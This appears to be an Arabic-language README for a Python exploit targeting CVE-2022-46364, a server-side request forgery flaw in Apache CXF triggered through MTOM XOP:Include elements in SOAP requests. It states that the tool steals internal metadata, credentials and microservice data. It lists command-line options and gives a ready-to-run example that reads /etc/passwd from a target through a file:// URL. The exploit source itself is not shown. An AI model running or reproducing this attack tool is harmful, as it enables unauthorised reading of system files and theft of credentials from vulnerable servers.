
استغلال Python لـ CVE-2022-46364 (Apache CXF SSRF عبر MTOM XOP:Include). يرسل طلبات SOAP مصممة لسرقة البيانات الوصفية الداخلية وبيانات الاعتماد وبيانات الخدمات المصغرة من نقاط النهاية الضعيفة.
أباتشي CXF SSRF عبر MTOM XOP:Include | CVSS 9.8 حرج
تسمح أباتشي CXF الإصدارات الأقل من 3.5.5 أو 3.4.10 بانتحال طلبات من جانب الخادم (SSRF) من خلال سمات href غير المُتحقق منها في عناصر XOP:Include داخل طلبات SOAP المشفرة بـ MTOM.
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - نقطة نهاية SOAP الخاصة بـ CXF المعرضة للهجوم (مطلوب)-s, --ssrf-url - الرابط الداخلي لاستخراج البيانات (مطلوب)-d, --domain - النطاق الهدف (الافتراضي: localhost)--plain-soap - استخدم SOAP العادي بدلاً من MTOM# Read /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com